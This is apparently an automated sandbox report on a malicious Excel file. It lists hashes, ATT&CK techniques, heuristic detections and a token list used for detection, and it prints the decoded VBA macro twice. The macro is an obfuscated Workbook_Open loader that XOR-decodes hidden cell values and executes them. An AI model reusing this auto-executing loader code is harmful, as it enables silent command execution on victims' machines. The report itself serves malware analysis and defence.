Office (OLE) / .XLS malware analysis — malicious · f2b6ffd4ecce7e73

MALICIOUS

Office (OLE) / .XLS

67.5 KB Created: 2023-09-10 00:09:26 Authoring application: Microsoft Excel First seen: 2023-09-12

MD5: 8a0eec19c5324236220f542abc338252 SHA-1: 640a6e7dd1627fbe850bd1d291c20285c044eda3 SHA-256: f2b6ffd4ecce7e73d0f6781352fdf1a7dd5dd9dcfa38f8cccc42277d684c8a79

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

This Excel file contains VBA macros, including a Workbook_Open event, which are designed to execute automatically. The macros utilize CreateObject and GetObject calls, indicating an attempt to interact with the system or download external content. The obfuscated VBA code likely decodes and executes a payload, but the specific URL or payload could not be reconstructed from the provided evidence.

Heuristics 5

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

                                                            GetObject(Midnight).CreateObject(Confidential).Run Spoken & " " & Brochure & Macintosh, 0

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

                                                            GetObject(Midnight).CreateObject(Confidential).Run Spoken & " " & Brochure & Macintosh, 0

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

                                                            Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4325 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4325 bytes
SHA-256: `caf8468e4aa6df3d46ef946899ecf5bf446a7c8ee76fa8db3b62015e8c0e9ed9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private Function Cooper(ByVal Specialized As String) As Variant Dim Alien As Long: Alien = 0: Dim Displaying() As Byte Dim Loving() As Byte, Quantum As String, SpotS As Integer, Untitled As Integer, Justin As Integer Loving = "sf315be629" GoTo Binary Scenario: If Alien < UBound(Displaying) Then SpotS = Alien Mod (10) Justin = Loving(SpotS * 2) Untitled = Displaying(Alien) GoTo SiSterS Drinks: Quantum = Quantum & Chr(Displaying(Alien)) Alien = Alien + 1 GoTo Scenario Else GoTo Judicial End If Judicial: Cooper = Quantum Exit Function Binary: Displaying = Genes(Specialized) GoTo Scenario SiSterS: Displaying(Alien) = Abs(Untitled Xor Justin) GoTo Drinks End Function Private Sub ConneCtor(ByVal Midnight As String, ByVal Macintosh As String, ByVal Spoken As String, ByVal Confidential As String, ByVal Brochure As String) GetObject(Midnight).CreateObject(Confidential).Run Spoken & " " & Brochure & Macintosh, 0 End Sub Sub Workbook_Open() ConneCtor Cooper(Sheets("fec8").Range("F107").Value), Cooper(Sheets("fec8").Range("F157").Value), Cooper(Sheets("fec8").Range("H122").Value), Cooper(Sheets("fec8").Range("H164").Value), Cooper(Sheets("fec8").Range("G135").Value) End Sub Private Function Genes(ByVal IndIanapolIs As String) As Variant Dim Quantum() As Byte, i As Long, SpotS As Integer, SeminarS As Integer SeminarS = Len(IndIanapolIs) / 2: i = 0: ReDim Quantum(0 To SeminarS) As Byte Justin: If i < Len(IndIanapolIs) Then SpotS = SpotS + 1 Quantum(SpotS - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(IndIanapolIs, i + 1, 2) i = i + 2 GoTo Justin Else GoTo Ethical Dim SiSterS As String SiSterS = InputBox("celp lape") End If Ethical: Genes = Quantum End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: caf8468e4aa6df3d46ef946899ecf5bf446a7c8ee76fa8db3b62015e8c0e9ed9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit








                                                Private Function Cooper(ByVal Specialized As String) As Variant
Dim Alien As Long: Alien = 0: Dim Displaying() As Byte
Dim Loving() As Byte, Quantum As String, SpotS As Integer, Untitled As Integer, Justin As Integer
Loving = "sf315be629"








            GoTo Binary
Scenario:
If Alien < UBound(Displaying) Then
SpotS = Alien Mod (10)







                                                    Justin = Loving(SpotS * 2)
Untitled = Displaying(Alien)







                                                            GoTo SiSterS





Drinks:







                                                





                                                                            Quantum = Quantum & Chr(Displaying(Alien))
Alien = Alien + 1
GoTo Scenario








                                                                Else





                                                GoTo Judicial







                                                            End If
Judicial:








               Cooper = Quantum
Exit Function







             





Binary:








           





                                            Displaying = Genes(Specialized)
GoTo Scenario
SiSterS:
Displaying(Alien) = Abs(Untitled Xor Justin)
GoTo Drinks






                End Function
Private Sub ConneCtor(ByVal Midnight As String, ByVal Macintosh As String, ByVal Spoken As String, ByVal Confidential As String, ByVal Brochure As String)







                                                            GetObject(Midnight).CreateObject(Confidential).Run Spoken & " " & Brochure & Macintosh, 0








                                                        







             





                                                                        End Sub






                





                                                            Sub Workbook_Open()






           ConneCtor Cooper(Sheets("fec8").Range("F107").Value), Cooper(Sheets("fec8").Range("F157").Value), Cooper(Sheets("fec8").Range("H122").Value), Cooper(Sheets("fec8").Range("H164").Value), Cooper(Sheets("fec8").Range("G135").Value)







                                                    End Sub
Private Function Genes(ByVal IndIanapolIs As String) As Variant
Dim Quantum() As Byte, i As Long, SpotS As Integer, SeminarS As Integer







             SeminarS = Len(IndIanapolIs) / 2: i = 0: ReDim Quantum(0 To SeminarS) As Byte








Justin:







            





                 If i < Len(IndIanapolIs) Then








          SpotS = SpotS + 1






          





                  Quantum(SpotS - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(IndIanapolIs, i + 1, 2)
i = i + 2







                                                                GoTo Justin








                                                                    Else








                                                    GoTo Ethical








                                                    





                                                                            Dim SiSterS As String







                SiSterS = InputBox("celp lape")







               End If






Ethical:







                                                        Genes = Quantum
End Function

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.